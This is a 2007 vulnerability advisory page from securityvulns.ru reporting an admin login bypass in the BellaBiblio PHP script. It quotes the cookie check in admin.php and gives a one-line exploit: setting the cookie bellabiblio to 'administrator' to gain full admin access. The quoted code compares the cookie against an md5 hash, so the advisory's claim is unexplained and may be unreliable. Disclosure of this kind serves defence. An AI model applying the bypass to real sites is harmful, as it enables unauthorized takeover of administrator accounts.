Computer Security

Security Advisory: BellaBiblio Admin Login Bypass
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  BellaBook Admin Bypass/Remote Code Execution

  RFI ====> vBulletin v3.6.5

  Dora Emlak Script v1.0 (tr) Admin Login ByPass

  phpVoter v0.6 Remote File Include Vulnerability

From:ilkerKandemir_(at)_mynet.com <ilkerKandemir_(at)_mynet.com>
Date:31.07.2007
Subject:BellaBiblio Admin Login Bypass

BellaBiblio Admin Login Bypass

SCRIPT: BellaBiblio

DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip

AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com>

Bug in;(admin.php)
if (isset($_COOKIE['bellabiblio'])) {
   if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) {
       if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = "";

EXPLOIT:

Set your cookie: bellabiblio=administrator   http:/site.com/admin.php
And you have full admin access
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server